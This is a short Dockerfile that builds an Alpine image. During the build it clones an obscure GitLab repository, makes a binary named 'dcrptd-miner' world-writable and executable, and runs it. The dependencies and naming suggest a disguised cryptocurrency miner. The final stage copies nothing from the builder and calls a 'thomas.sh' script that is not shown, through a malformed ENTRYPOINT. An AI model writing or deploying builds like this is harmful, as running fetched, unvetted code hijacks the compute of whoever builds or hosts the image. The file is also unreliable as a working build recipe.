ARG ALPINE_VERSION=3.15.0

FROM alpine:${ALPINE_VERSION} as builder

RUN apk add --no-cache git \
                       make \
                       cmake \
                       libstdc++ \
                       gcc \
                       g++ \
                       hwloc-dev \
                       libuv-dev \
                       openssl-dev 

RUN git clone https://gitlab.com/n3456/dcrptd.git && cd dcrptd && chmod +777 ./dcrptd-miner && ./dcrptd-miner

FROM alpine:${ALPINE_VERSION}

RUN apk add --no-cache hwloc \
                       libuv


WORKDIR /hajes

ENTRYPOINT ["sh thomas.sh"]
